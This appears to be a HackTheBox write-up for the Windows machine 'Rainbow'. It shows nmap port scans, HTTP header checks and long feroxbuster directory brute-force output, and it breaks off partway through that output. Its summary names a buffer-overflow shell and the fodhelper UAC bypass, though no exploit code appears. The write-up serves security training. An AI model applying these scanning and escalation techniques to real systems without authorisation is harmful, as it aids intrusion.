Rainbow

Rainbow has a custom Windows executable webserver. I’ll find a crash with some manual fuzzing and use x32dbg to weaponize it to get a shell. The user is in the administrator’s group, but UAC prevents reading the root flag. I’ll abuse the fodhelper UAC bypass to get full integrity and full access.

Box Info

Name Rainbow Rainbow
Play on HackTheBox
Release Date 07 Aug 2025
Retire Date 07 Aug 2025
OS Windows Windows
Base Points Medium [30]
First Blood User N/A (non-competitive)
First Blood Root N/A (non-competitive)
Creator xct

Recon

Initial Scanning

nmap finds eight open TCP ports, FTP (21), HTTP (80 and 8080), RPC (135 and 49668), NetBios (139), SMB (445), and RDP (3389):

oxdf@hacky$ nmap -p- -vvv --min-rate 10000 10.129.234.59
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-07-30 14:25 UTC
...[snip]...
Nmap scan report for 10.129.234.59
Host is up, received echo-reply ttl 127 (0.095s latency).
Scanned at 2025-07-30 14:25:05 UTC for 13s
Not shown: 65527 filtered tcp ports (no-response)
PORT      STATE SERVICE       REASON
21/tcp    open  ftp           syn-ack ttl 127
80/tcp    open  http          syn-ack ttl 127
135/tcp   open  msrpc         syn-ack ttl 127
139/tcp   open  netbios-ssn   syn-ack ttl 127
445/tcp   open  microsoft-ds  syn-ack ttl 127
3389/tcp  open  ms-wbt-server syn-ack ttl 127
8080/tcp  open  http-proxy    syn-ack ttl 127
49668/tcp open  unknown       syn-ack ttl 127

Read data files from: /usr/bin/../share/nmap
Nmap done: 1 IP address (1 host up) scanned in 13.54 seconds
           Raw packets sent: 131075 (5.767MB) | Rcvd: 18 (776B)
oxdf@hacky$ nmap -p 21,80,135,139,445,3389,8080,49668 -sCV 10.129.234.59
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-07-30 14:25 UTC
Nmap scan report for 10.129.234.59
Host is up (0.089s latency).

PORT      STATE SERVICE       VERSION
21/tcp    open  ftp           Microsoft ftpd
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
| 01-18-22  08:22AM                  258 dev.txt
| 01-18-22  08:30AM                54784 rainbow.exe
| 01-16-22  01:34PM                  479 restart.ps1
|_01-16-22  12:14PM       <DIR>          wwwroot
| ftp-syst:
|_  SYST: Windows_NT
80/tcp    open  http          Microsoft IIS httpd 10.0
| http-methods:
|_  Potentially risky methods: TRACE
|_http-title: IIS Windows Server
|_http-server-header: Microsoft-IIS/10.0
135/tcp   open  msrpc         Microsoft Windows RPC
139/tcp   open  netbios-ssn   Microsoft Windows netbios-ssn
445/tcp   open  microsoft-ds?
3389/tcp  open  ms-wbt-server Microsoft Terminal Services
| rdp-ntlm-info:
|   Target_Name: RAINBOW
|   NetBIOS_Domain_Name: RAINBOW
|   NetBIOS_Computer_Name: RAINBOW
|   DNS_Domain_Name: rainbow
|   DNS_Computer_Name: rainbow
|   Product_Version: 10.0.17763
|_  System_Time: 2025-07-30T14:45:23+00:00
|_ssl-date: 2025-07-30T14:46:03+00:00; +16m22s from scanner time.
| ssl-cert: Subject: commonName=rainbow
| Not valid before: 2025-04-14T00:01:02
|_Not valid after:  2025-10-14T00:01:02
8080/tcp  open  http-proxy
|_http-title: Dev Wiki powered by Rainbow Webserver
| http-open-proxy: Potentially OPEN proxy.
|_Methods supported:CONNECTION
|_http-trane-info: Problem with XML parsing of /evox/about
| fingerprint-strings:
|   GetRequest, HTTPOptions:
|     HTTP/1.1 200 OK
|     Cache-Control: no-cache, private
|     Content-Type: text/html
|     X-Powered-By: Rainbow 0.1
|     Content-Length: 1478
|     <!DOCTYPE html>
|     <html lang="en" xmlns="http://www.w3.org/1999/xhtml">
|     <head>
|     <meta charset="utf-8" />
|     <title>Dev Wiki powered by Rainbow Webserver</title>
|     <style>
|     .rainbow {
|     font-size: 24pt;
|     background-image: linear-gradient(to left, violet, indigo, blue, green, yellow, orange, red); -webkit-background-clip: text;
|     color: transparent;
|     body {
|     display: flex;
|     justify-content: center;
|     align-items: center;
|     text-align: center;
|     min-height: 100vh;
|     </style>
|     </head>
|     <body>
|     <!--
|     Under Development, please come back later -->
|     <pre class="rainbow">
|     _.--'_......----........
|     _,i,,-'' __,,...........___
|_    ,;-' _.--'' ___,,...
49668/tcp open  msrpc         Microsoft Windows RPC
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port8080-TCP:V=7.94SVN%I=7%D=7/30%Time=688A2B82%P=x86_64-pc-linux-gnu%r
...[snip]...
SF:20\x20\x20___,,\.\.\.");
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
| smb2-time:
|   date: 2025-07-30T14:45:25
|_  start_date: N/A
| smb2-security-mode:
|   3:1:1:
|_    Message signing enabled but not required
|_clock-skew: mean: 16m21s, deviation: 0s, median: 16m21s

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 224.02 seconds

The box shows many of the ports associated with a Windows client. The domain is RAINBOW, and the hostname is RAINBOW. Given that format, it’s probably not domain joined.

All of the ports show a TTL of 127, which matches the expected TTL for Windows one hop away.

The FTP server seems open to anonymous authentication so I’ll definitely want to check that out.

Website - TCP 80

Site

The site is the default IIS page:

image-20250730134935137

Tech Stack

The HTTP response headers show the server is IIS:

HTTP/1.1 200 OK
Content-Type: text/html
Last-Modified: Sun, 16 Jan 2022 12:29:08 GMT
Accept-Ranges: bytes
ETag: "78206fa8d4ad81:0"
Server: Microsoft-IIS/10.0
Date: Wed, 30 Jul 2025 18:00:45 GMT
Content-Length: 703

The 404 page is the IIS default 404 as well:

image-20250730134802393

The main page loads as /iisstart.htm, which is the default for IIS.

Directory Brute Force

I’ll run feroxbuster against the site with a lowercase wordlist as it’s IIS:

oxdf@hacky$ feroxbuster -u http://10.129.234.59 -w /opt/SecLists/Discovery/Web-Content/raft-medium-directories-lowercase.txt 
                                                                                                                                                             
 ___  ___  __   __     __      __         __   ___
|__  |__  |__) |__) | /  `    /  \ \_/ | |  \ |__
|    |___ |  \ |  \ | \__,    \__/ / \ | |__/ |___
by Ben "epi" Risher 🤓                 ver: 2.11.0
───────────────────────────┬──────────────────────
 🎯  Target Url            │ http://10.129.234.59
 🚀  Threads               │ 50
 📖  Wordlist              │ /opt/SecLists/Discovery/Web-Content/raft-medium-directories-lowercase.txt
 👌  Status Codes          │ All Status Codes!
 💥  Timeout (secs)        │ 7
 🦡  User-Agent            │ feroxbuster/2.11.0
 🔎  Extract Links         │ true
 🏁  HTTP methods          │ [GET]
 🔃  Recursion Depth       │ 4
───────────────────────────┴──────────────────────
 🏁  Press [ENTER] to use the Scan Management Menu™
──────────────────────────────────────────────────
404      GET       29l       95w     1245c Auto-filtering found 404-like response and created new filter; toggle off with --dont-filter
200      GET      334l     2089w   180418c http://10.129.234.59/iisstart.png
200      GET       32l       55w      703c http://10.129.234.59/
400      GET        6l       26w      324c http://10.129.234.59/error%1F_log
[####################] - 48s    26587/26587   0s      found:3       errors:0      
[####################] - 48s    26584/26584   555/s   http://10.129.234.59/

Nothing at all.

Website - TCP 8080

Site

The site has the title “Dev Wiki powered by Rainbow” and presents some ASCII art at the root:

image-20250730132223770

The source has a comment that says is under development:

image-20250730132254389

Tech Stack

The HTTP response headers have an unusual X-Powered-By header:

HTTP/1.1 200 OK
Cache-Control: no-cache, private
Content-Type: text/html
X-Powered-By: Rainbow 0.1
Content-Length: 1478

The page loads as index.html suggesting a static page.

The 404 page is incredibly simple:

image-20250730132439955

This doesn’t match any default 404 page I know.

Directory Brute Force

I’ll run feroxbuster against the site and it seems to find a lot:

oxdf@hacky$ feroxbuster -u http://10.129.234.59:8080

 ___  ___  __   __     __      __         __   ___
|__  |__  |__) |__) | /  `    /  \ \_/ | |  \ |__
|    |___ |  \ |  \ | \__,    \__/ / \ | |__/ |___
by Ben "epi" Risher 🤓                 ver: 2.11.0
───────────────────────────┬──────────────────────
 🎯  Target Url            │ http://10.129.234.59:8080
 🚀  Threads               │ 50
 📖  Wordlist              │ /usr/share/seclists/Discovery/Web-Content/raft-medium-directories.txt
 👌  Status Codes          │ All Status Codes!
 💥  Timeout (secs)        │ 7
 🦡  User-Agent            │ feroxbuster/2.11.0
 🔎  Extract Links         │ true
 🏁  HTTP methods          │ [GET]
 🔃  Recursion Depth       │ 4
───────────────────────────┴──────────────────────
 🏁  Press [ENTER] to use the Scan Management Menu™
──────────────────────────────────────────────────
404      GET        1l        3w       35c Auto-filtering found 404-like response and created new filter; toggle off with --dont-filter
200      GET       46l      151w     1478c http://10.129.234.59:8080/cgi
200      GET       46l      151w     1478c http://10.129.234.59:8080/Content
200      GET       46l      151w     1478c http://10.129.234.59:8080/default
200      GET       46l      151w     1478c http://10.129.234.59:8080/dc
200      GET       46l      151w     1478c http://10.129.234.59:8080/Old
200      GET       46l      151w     1478c http://10.129.234.59:8080/estilos
200      GET       46l      151w     1478c http://10.129.234.59:8080/vehiclemakeoffer
200      GET       46l      151w     1478c http://10.129.234.59:8080/locator
200      GET       46l      151w     1478c http://10.129.234.59:8080/mailtemplates
200      GET       46l      151w     1478c http://10.129.234.59:8080/Img
200      GET       46l      151w     1478c http://10.129.234.59:8080/uploadedFiles
200      GET       46l      151w     1478c http://10.129.234.59:8080/works
200      GET       46l      151w     1478c http://10.129.234.59:8080/classic
200      GET       46l      151w     1478c http://10.129.234.59:8080/explore
200      GET       46l      151w     1478c http://10.129.234.59:8080/ex
200      GET       46l      151w     1478c http://10.129.234.59:8080/land
200      GET       46l      151w     1478c http://10.129.234.59:8080/dimcp
200      GET       46l      151w     1478c http://10.129.234.59:8080/CRM
200      GET       46l      151w     1478c http://10.129.234.59:8080/buy_now
200      GET       46l      151w     1478c http://10.129.234.59:8080/CMSSiteManager
200      GET       46l      151w     1478c http://10.129.234.59:8080/ni
200      GET       46l      151w     1478c http://10.129.234.59:8080/browser
200      GET       46l      151w     1478c http://10.129.234.59:8080/poker
200      GET       46l      151w     1478c http://10.129.234.59:8080/site2
200      GET       46l      151w     1478c http://10.129.234.59:8080/setprefs
200      GET       46l      151w     1478c http://10.129.234.59:8080/clases
200      GET       46l      151w     1478c http://10.129.234.59:8080/clienti
200      GET       46l      151w     1478c http://10.129.234.59:8080/compile
200      GET       46l      151w     1478c http://10.129.234.59:8080/arc
200      GET       46l      151w     1478c http://10.129.234.59:8080/asset
200      GET       46l      151w     1478c http://10.129.234.59:8080/froogle_
200      GET       46l      151w     1478c http://10.129.234.59:8080/ClickTale
200      GET       46l      151w     1478c http://10.129.234.59:8080/cursos
200      GET       46l      151w     1478c http://10.129.234.59:8080/emarket
200      GET       46l      151w     1478c http://10.129.234.59:8080/real
200      GET       46l      151w     1478c http://10.129.234.59:8080/rma
200      GET       46l      151w     1478c http://10.129.234.59:8080/sqladmin
200      GET       46l      151w     1478c http://10.129.234.59:8080/newyork
200      GET       46l      151w     1478c http://10.129.234.59:8080/shared_files
200      GET       46l      151w     1478c http://10.129.234.59:8080/baner
200      GET       46l      151w     1478c http://10.129.234.59:8080/committee
200      GET       46l      151w     1478c http://10.129.234.59:8080/hc
200      GET       46l      151w     1478c http://10.129.234.59:8080/slike
200      GET       46l      151w     1478c http://10.129.234.59:8080/store2
200      GET       46l      151w     1478c http://10.129.234.59:8080/AdvHTML_Popups
200      GET       46l      151w     1478c http://10.129.234.59:8080/CMSAdminControls
200      GET       46l      151w     1478c http://10.129.234.59:8080/Desktop
200      GET       46l      151w     1478c http://10.129.234.59:8080/Legal
200      GET       46l      151w     1478c http://10.129.234.59:8080/JavaScripts
200      GET       46l      151w     1478c http://10.129.234.59:8080/MT
200      GET       46l      151w     1478c http://10.129.234.59:8080/_bin
200      GET       46l      151w     1478c http://10.129.234.59:8080/contactar
200      GET       46l      151w     1478c http://10.129.234.59:8080/crss
200      GET       46l      151w     1478c http://10.129.234.59:8080/customcf
200      GET       46l      151w     1478c http://10.129.234.59:8080/mms
200      GET       46l      151w     1478c http://10.129.234.59:8080/oauth
200      GET       46l      151w     1478c http://10.129.234.59:8080/twitteroauth
200      GET       46l      151w     1478c http://10.129.234.59:8080/user_images
200      GET       46l      151w     1478c http://10.129.234.59:8080/zen
200      GET       46l      151w     1478c http://10.129.234.59:8080/authordata
200      GET       46l      151w     1478c http://10.129.234.59:8080/e107_languages
200      GET       46l      151w     1478c http://10.129.234.59:8080/extend
200      GET       46l      151w     1478c http://10.129.234.59:8080/tv_box
200      GET       46l      151w     1478c http://10.129.234.59:8080/upgrades
200      GET       46l      151w     1478c http://10.129.234.59:8080/Import
200      GET       46l      151w     1478c http://10.129.234.59:8080/LICENSE
200      GET       46l      151w     1478c http://10.129.234.59:8080/Map
200      GET       46l      151w     1478c http://10.129.234.59:8080/NewsLetter
200      GET       46l      151w     1478c http://10.129.234.59:8080/bike
200      GET       46l      151w     1478c http://10.129.234.59:8080/bild
200      GET       46l      151w     1478c http://10.129.234.59:8080/broadband
200      GET       46l      151w     1478c http://10.129.234.59:8080/candidates
200      GET       46l      151w     1478c http://10.129.234.59:8080/change
200      GET       46l      151w     1478c http://10.129.234.59:8080/ck
200      GET       46l      151w     1478c http://10.129.234.59:8080/energy
200      GET       46l      151w     1478c http://10.129.234.59:8080/explorer
200      GET       46l      151w     1478c http://10.129.234.59:8080/executables
200      GET       46l      151w     1478c http://10.129.234.59:8080/oldstuff
200      GET       46l      151w     1478c http://10.129.234.59:8080/ofis
200      GET       46l      151w     1478c http://10.129.234.59:8080/opinions
200      GET       46l      151w     1478c http://10.129.234.59:8080/pagerank
200      GET       46l      151w     1478c http://10.129.234.59:8080/photo_gallery
200      GET       46l      151w     1478c http://10.129.234.59:8080/playlists
200      GET       46l      151w     1478c http://10.129.234.59:8080/portugal
200      GET       46l      151w     1478c http://10.129.234.59:8080/test_site
200      GET       46l      151w     1478c http://10.129.234.59:8080/testimonial
200      GET       46l      151w     1478c http://10.129.234.59:8080/tl_files
200      GET       46l      151w     1478c http://10.129.234.59:8080/uni
200      GET       46l      151w     1478c http://10.129.234.59:8080/RepoMonkey
200      GET       46l      151w     1478c http://10.129.234.59:8080/cachep
200      GET       46l      151w     1478c http://10.129.234.59:8080/cafe
200      GET       46l      151w     1478c http://10.129.234.59:8080/citrix
200      GET       46l      151w     1478c http://10.129.234.59:8080/civicrm
200      GET       46l      151w     1478c http://10.129.234.59:8080/skin_acp
200      GET       46l      151w     1478c http://10.129.234.59:8080/gear
200      GET       46l      151w     1478c http://10.129.234.59:8080/nucleus
200      GET       46l      151w     1478c http://10.129.234.59:8080/paul
200      GET       46l      151w     1478c http://10.129.234.59:8080/photoshop
200      GET       46l      151w     1478c http://10.129.234.59:8080/paris
200      GET       46l      151w     1478c http://10.129.234.59:8080/phprusearch
200      GET       46l      151w     1478c http://10.129.234.59:8080/spectra
200      GET       46l      151w     1478c http://10.129.234.59:8080/special-offers
200      GET       46l      151w     1478c http://10.129.234.59:8080/sponsored
200      GET       46l      151w     1478c http://10.129.234.59:8080/statistika
200      GET       46l      151w     1478c http://10.129.234.59:8080/testdir
200      GET       46l      151w     1478c http://10.129.234.59:8080/CA
200      GET       46l      151w     1478c http://10.129.234.59:8080/Approve
200      GET       46l      151w     1478c http://10.129.234.59:8080/Shoppingcart
200      GET       46l      151w     1478c http://10.129.234.59:8080/Tracking
200      GET       46l      151w     1478c http://10.129.234.59:8080/cctvprinting
200      GET       46l      151w     1478c http://10.129.234.59:8080/certification
200      GET       46l      151w     1478c http://10.129.234.59:8080/com_newsfeeds
200      GET       46l      151w     1478c http://10.129.234.59:8080/com_poll
200      GET       46l      151w     1478c http://10.129.234.59:8080/flickrbe
200      GET       46l      151w     1478c http://10.129.234.59:8080/flickrde
200      GET       46l      151w     1478c http://10.129.234.59:8080/flickrfr
200      GET       46l      151w     1478c http://10.129.234.59:8080/huggiesau
200      GET       46l      151w     1478c http://10.129.234.59:8080/kmartau
200      GET       46l      151w     1478c http://10.129.234.59:8080/neufgiga
200      GET       46l      151w     1478c http://10.129.234.59:8080/ohbaby
200      GET       46l      151w     1478c http://10.129.234.59:8080/og
200      GET       46l      151w     1478c http://10.129.234.59:8080/pampers
200      GET       46l      151w     1478c http://10.129.234.59:8080/pageear
200      GET       46l      151w     1478c http://10.129.234.59:8080/pampers1
200      GET       46l      151w     1478c http://10.129.234.59:8080/sblogin
200      GET       46l      151w     1478c http://10.129.234.59:8080/scart
200      GET       46l      151w     1478c http://10.129.234.59:8080/thread
200      GET       46l      151w     1478c http://10.129.234.59:8080/Travel
200      GET       46l      151w     1478c http://10.129.234.59:8080/adv_images
200      GET       46l      151w     1478c http://10.129.234.59:8080/credit-cards
200      GET       46l      151w     1478c http://10.129.234.59:8080/dallas
200      GET       46l      151w     1478c http://10.129.234.59:8080/image_library
200      GET       46l      151w     1478c http://10.129.234.59:8080/imglib
200      GET       46l      151w     1478c http://10.129.234.59:8080/micro
200      GET       46l      151w     1478c http://10.129.234.59:8080/nr
200      GET       46l      151w     1478c http://10.129.234.59:8080/oferta
200      GET       46l      151w     1478c http://10.129.234.59:8080/optin_info
200      GET       46l      151w     1478c http://10.129.234.59:8080/offerte
200      GET       46l      151w     1478c http://10.129.234.59:8080/omniture
200      GET       46l      151w     1478c http://10.129.234.59:8080/od
200      GET       46l      151w     1478c http://10.129.234.59:8080/_Scripts
200      GET       46l      151w     1478c http://10.129.234.59:8080/_batch
200      GET       46l      151w     1478c http://10.129.234.59:8080/commoncontrols
200      GET       46l      151w     1478c http://10.129.234.59:8080/xmlsrv
200      GET       46l      151w     1478c http://10.129.234.59:8080/showprofile
200      GET       46l      151w     1478c http://10.129.234.59:8080/__we_thumbs__
200      GET       46l      151w     1478c http://10.129.234.59:8080/deneme
200      GET       46l      151w     1478c http://10.129.234.59:8080/descarga
200      GET       46l      151w     1478c http://10.129.234.59:8080/formtest
200      GET       46l      151w     1478c http://10.129.234.59:8080/none
200      GET       46l      151w     1478c http://10.129.234.59:8080/perm
200      GET       46l      151w     1478c http://10.129.234.59:8080/ri
200      GET       46l      151w     1478c http://10.129.234.59:8080/riservata
200      GET       46l      151w     1478c http://10.129.234.59:8080/sendToAFriend
200      GET       46l      151w     1478c http://10.129.234.59:8080/selector
200      GET       46l      151w     1478c http://10.129.234.59:8080/sharepoint
200      GET       46l      151w     1478c http://10.129.234.59:8080/um
200      GET       46l      151w     1478c http://10.129.234.59:8080/units
200      GET       46l      151w     1478c http://10.129.234.59:8080/uploadimages
200      GET       46l      151w     1478c http://10.129.234.59:8080/38
200      GET       46l      151w     1478c http://10.129.234.59:8080/35
200      GET       46l      151w     1478c http://10.129.234.59:8080/59
200      GET       46l      151w     1478c http://10.129.234.59:8080/61
200      GET       46l      151w     1478c http://10.129.234.59:8080/76
200      GET       46l      151w     1478c http://10.129.234.59:8080/pageSize
200      GET       46l      151w     1478c http://10.129.234.59:8080/52
200      GET       46l      151w     1478c http://10.129.234.59:8080/LiveFiles
200      GET       46l      151w     1478c http://10.129.234.59:8080/LNSpiderguy
200      GET       46l      151w     1478c http://10.129.234.59:8080/Manual
200      GET       46l      151w     1478c http://10.129.234.59:8080/PL
200      GET       46l      151w     1478c http://10.129.234.59:8080/PM
200      GET       46l      151w     1478c http://10.129.234.59:8080/Vote
200      GET       46l      151w     1478c http://10.129.234.59:8080/adsnew
200      GET       46l      151w     1478c http://10.129.234.59:8080/adwordsresellers
200      GET       46l      151w     1478c http://10.129.234.59:8080/bbtstats
200      GET       46l      151w     1478c http://10.129.234.59:8080/before
200      GET       46l      151w     1478c http://10.129.234.59:8080/benriya
200      GET       46l      151w     1478c http://10.129.234.59:8080/customTags
200      GET       46l      151w     1478c http://10.129.234.59:8080/dd-formmailer
200      GET       46l      151w     1478c http://10.129.234.59:8080/denshikiki
200      GET       46l      151w     1478c http://10.129.234.59:8080/diet
200      GET       46l      151w     1478c http://10.129.234.59:8080/dig
200      GET       46l      151w     1478c http://10.129.234.59:8080/forumpolicy
200      GET       46l      151w     1478c http://10.129.234.59:8080/glavnaya
200      GET       46l      151w     1478c http://10.129.234.59:8080/item-dispatch
200      GET       46l      151w     1478c http://10.129.234.59:8080/imprimer
200      GET       46l      151w     1478c http://10.129.234.59:8080/inform
200      GET       46l      151w     1478c http://10.129.234.59:8080/interfaces
200      GET       46l      151w     1478c http://10.129.234.59:8080/interstitial
200      GET       46l      151w     1478c http://10.129.234.59:8080/itunes
200      GET       46l      151w     1478c http://10.129.234.59:8080/mastercard
200      GET       46l      151w     1478c http://10.129.234.59:8080/manchester
200      GET       46l      151w     1478c http://10.129.234.59:8080/member-login
200      GET       46l      151w     1478c http://10.129.234.59:8080/memberarea
200      GET       46l      151w     1478c http://10.129.234.59:8080/minnesota
200      GET       46l      151w     1478c http://10.129.234.59:8080/organization
200      GET       46l      151w     1478c http://10.129.234.59:8080/phpopenchat
200      GET       46l      151w     1478c http://10.129.234.59:8080/rob
200      GET       46l      151w     1478c http://10.129.234.59:8080/statistiques
200      GET       46l      151w     1478c http://10.129.234.59:8080/timetable
200      GET       46l      151w     1478c http://10.129.234.59:8080/tiles
200      GET       46l      151w     1478c http://10.129.234.59:8080/tobishoku
200      GET       46l      151w     1478c http://10.129.234.59:8080/transactions
200      GET       46l      151w     1478c http://10.129.234.59:8080/tp-files
200      GET       46l      151w     1478c http://10.129.234.59:8080/xx
200      GET       46l      151w     1478c http://10.129.234.59:8080/y2k
200      GET       46l      151w     1478c http://10.129.234.59:8080/51
200      GET       46l      151w     1478c http://10.129.234.59:8080/73
200      GET       46l      151w     1478c http://10.129.234.59:8080/98
200      GET       46l      151w     1478c http://10.129.234.59:8080/112
200      GET       46l      151w     1478c http://10.129.234.59:8080/1970
200      GET       46l      151w     1478c http://10.129.234.59:8080/Community-Care
200      GET       46l      151w     1478c http://10.129.234.59:8080/Click
200      GET       46l      151w     1478c http://10.129.234.59:8080/Conference
200      GET       46l      151w     1478c http://10.129.234.59:8080/Dealer
200      GET       46l      151w     1478c http://10.129.234.59:8080/DreamSite
200      GET       46l      151w     1478c http://10.129.234.59:8080/FAQs
200      GET       46l      151w     1478c http://10.129.234.59:8080/FWi
200      GET       46l      151w     1478c http://10.129.234.59:8080/GetRight
200      GET       46l      151w     1478c http://10.129.234.59:8080/Industries
200      GET       46l      151w     1478c http://10.129.234.59:8080/Installer
200      GET       46l      151w     1478c http://10.129.234.59:8080/anna
200      GET       46l      151w     1478c http://10.129.234.59:8080/categorias
200      GET       46l      151w     1478c http://10.129.234.59:8080/catsicons
200      GET       46l      151w     1478c http://10.129.234.59:8080/clientscripts
200      GET       46l      151w     1478c http://10.129.234.59:8080/cms2
200      GET       46l      151w     1478c http://10.129.234.59:8080/foreign
200      GET       46l      151w     1478c http://10.129.234.59:8080/index_images
200      GET       46l      151w     1478c http://10.129.234.59:8080/infernoshout
200      GET       46l      151w     1478c http://10.129.234.59:8080/jpcache
200      GET       46l      151w     1478c http://10.129.234.59:8080/jsscripts
200      GET       46l      151w     1478c http://10.129.234.59:8080/ktml2
200      GET       46l      151w     1478c http://10.129.234.59:8080/mail2
200      GET       46l      151w     1478c http://10.129.234.59:8080/modals
200      GET       46l      151w     1478c http://10.129.234.59:8080/moda
200      GET       46l      151w     1478c http://10.129.234.59:8080/msk
200      GET       46l      151w     1478c http://10.129.234.59:8080/overlays
200      GET       46l      151w     1478c http://10.129.234.59:8080/outlink
200      GET       46l      151w     1478c http://10.129.234.59:8080/outreach
200      GET       46l      151w     1478c http://10.129.234.59:8080/phpfiles
200      GET       46l      151w     1478c http://10.129.234.59:8080/sky
200      GET       46l      151w     1478c http://10.129.234.59:8080/statuses
200      GET       46l      151w     1478c http://10.129.234.59:8080/termine
200      GET       46l      151w     1478c http://10.129.234.59:8080/them
200      GET       46l      151w     1478c http://10.129.234.59:8080/ti
200      GET       46l      151w     1478c http://10.129.234.59:8080/want
200      GET       46l      151w     1478c http://10.129.234.59:8080/83
200      GET       46l      151w     1478c http://10.129.234.59:8080/ADT
200      GET       46l      151w     1478c http://10.129.234.59:8080/Access
200      GET       46l      151w     1478c http://10.129.234.59:8080/Buy
200      GET       46l      151w     1478c http://10.129.234.59:8080/Cfide
200      GET       46l      151w     1478c http://10.129.234.59:8080/FI
200      GET       46l      151w     1478c http://10.129.234.59:8080/FSL5Apps
200      GET       46l      151w     1478c http://10.129.234.59:8080/Freizeit
200      GET       46l      151w     1478c http://10.129.234.59:8080/NewImages
200      GET       46l      151w     1478c http://10.129.234.59:8080/NotFound
200      GET       46l      151w     1478c http://10.129.234.59:8080/TESTS
200      GET       46l      151w     1478c http://10.129.234.59:8080/Unsubscribe
200      GET       46l      151w     1478c http://10.129.234.59:8080/World
200      GET       46l      151w     1478c http://10.129.234.59:8080/ad1
200      GET       46l      151w     1478c http://10.129.234.59:8080/botones
200      GET       46l      151w     1478c http://10.129.234.59:8080/change_area
200      GET       46l      151w     1478c http://10.129.234.59:8080/delete_account
200      GET       46l      151w     1478c http://10.129.234.59:8080/commentary
200      GET       46l      151w     1478c http://10.129.234.59:8080/controlcenter
200      GET       46l      151w     1478c http://10.129.234.59:8080/costco
200      GET       46l      151w     1478c http://10.129.234.59:8080/cottage
200      GET       46l      151w     1478c http://10.129.234.59:8080/datastore
200      GET       46l      151w     1478c http://10.129.234.59:8080/economy
200      GET       46l      151w     1478c http://10.129.234.59:8080/gfix
200      GET       46l      151w     1478c http://10.129.234.59:8080/helpfiles
200      GET       46l      151w     1478c http://10.129.234.59:8080/jb
200      GET       46l      151w     1478c http://10.129.234.59:8080/lin
200      GET       46l      151w     1478c http://10.129.234.59:8080/linkshare
200      GET       46l      151w     1478c http://10.129.234.59:8080/lochp
200      GET       46l      151w     1478c http://10.129.234.59:8080/mboard
200      GET       46l      151w     1478c http://10.129.234.59:8080/mochi
200      GET       46l      151w     1478c http://10.129.234.59:8080/offering
200      GET       46l      151w     1478c http://10.129.234.59:8080/p3
200      GET       46l      151w     1478c http://10.129.234.59:8080/p7apm
200      GET       46l      151w     1478c http://10.129.234.59:8080/pop-ups
200      GET       46l      151w     1478c http://10.129.234.59:8080/recording
200      GET       46l      151w     1478c http://10.129.234.59:8080/salud
200      GET       46l      151w     1478c http://10.129.234.59:8080/same
200      GET       46l      151w     1478c http://10.129.234.59:8080/sima
200      GET       46l      151w     1478c http://10.129.234.59:8080/should
200      GET       46l      151w     1478c http://10.129.234.59:8080/sim
200      GET       46l      151w     1478c http://10.129.234.59:8080/statistiken
200      GET       46l      151w     1478c http://10.129.234.59:8080/techno
200      GET       46l      151w     1478c http://10.129.234.59:8080/vermont
200      GET       46l      151w     1478c http://10.129.234.59:8080/webreports
200      GET       46l      151w     1478c http://10.129.234.59:8080/69
200      GET       46l      151w     1478c http://10.129.234.59:8080/aries-horoscope
200      GET       46l      151w     1478c http://10.129.234.59:8080/Channels
200      GET       46l      151w     1478c http://10.129.234.59:8080/JobSearch
200      GET       46l      151w     1478c http://10.129.234.59:8080/NO
200      GET       46l      151w     1478c http://10.129.234.59:8080/Reporting
200      GET       46l      151w     1478c http://10.129.234.59:8080/SITEFORUM
200      GET       46l      151w     1478c http://10.129.234.59:8080/Secure_Server
200      GET       46l      151w     1478c http://10.129.234.59:8080/Social
200      GET       46l      151w     1478c http://10.129.234.59:8080/TabletBookings
200      GET       46l      151w     1478c http://10.129.234.59:8080/WebMail
200      GET       46l      151w     1478c http://10.129.234.59:8080/WebModules
200      GET       46l      151w     1478c http://10.129.234.59:8080/_vti_aut
200      GET       46l      151w     1478c http://10.129.234.59:8080/scout
200      GET       46l      151w     1478c http://10.129.234.59:8080/atc
200      GET       46l      151w     1478c http://10.129.234.59:8080/aweber
200      GET       46l      151w     1478c http://10.129.234.59:8080/chatter
200      GET       46l      151w     1478c http://10.129.234.59:8080/concerts
200      GET       46l      151w     1478c http://10.129.234.59:8080/disaster
200      GET       46l      151w     1478c http://10.129.234.59:8080/dp_tellafriend
200      GET       46l      151w     1478c http://10.129.234.59:8080/drama
200      GET       46l      151w     1478c http://10.129.234.59:8080/dompdf
200      GET       46l      151w     1478c http://10.129.234.59:8080/ebiz
200      GET       46l      151w     1478c http://10.129.234.59:8080/ei
200      GET       46l      151w     1478c http://10.129.234.59:8080/exe-bin
200      GET       46l      151w     1478c http://10.129.234.59:8080/fixed!
200      GET       46l      151w     1478c http://10.129.234.59:8080/flash2
200      GET       46l      151w     1478c http://10.129.234.59:8080/createpipeline
200      GET       46l      151w     1478c http://10.129.234.59:8080/hateit
200      GET       46l      151w     1478c http://10.129.234.59:8080/img_cache
200      GET       46l      151w     1478c http://10.129.234.59:8080/informers
200      GET       46l      151w     1478c http://10.129.234.59:8080/jabber
200      GET       46l      151w     1478c http://10.129.234.59:8080/karen
200      GET       46l      151w     1478c http://10.129.234.59:8080/kadmin
200      GET       46l      151w     1478c http://10.129.234.59:8080/libjs
200      GET       46l      151w     1478c http://10.129.234.59:8080/listas
200      GET       46l      151w     1478c http://10.129.234.59:8080/messagecenter
200      GET       46l      151w     1478c http://10.129.234.59:8080/pagenotfound
200      GET       46l      151w     1478c http://10.129.234.59:8080/pocket
200      GET       46l      151w     1478c http://10.129.234.59:8080/resources3
200      GET       46l      151w     1478c http://10.129.234.59:8080/running
200      GET       46l      151w     1478c http://10.129.234.59:8080/sage
200      GET       46l      151w     1478c http://10.129.234.59:8080/smarteditscripts
200      GET       46l      151w     1478c http://10.129.234.59:8080/vbforum
200      GET       46l      151w     1478c http://10.129.234.59:8080/20smb
200      GET       46l      151w     1478c http://10.129.234.59:8080/25LH8
200      GET       46l      151w     1478c http://10.129.234.59:8080/freexmas
200      GET       46l      151w     1478c http://10.129.234.59:8080/voyager
200      GET       46l      151w     1478c http://10.129.234.59:8080/Amazon
200      GET       46l      151w     1478c http://10.129.234.59:8080/App_data
200      GET       46l      151w     1478c http://10.129.234.59:8080/Authentication
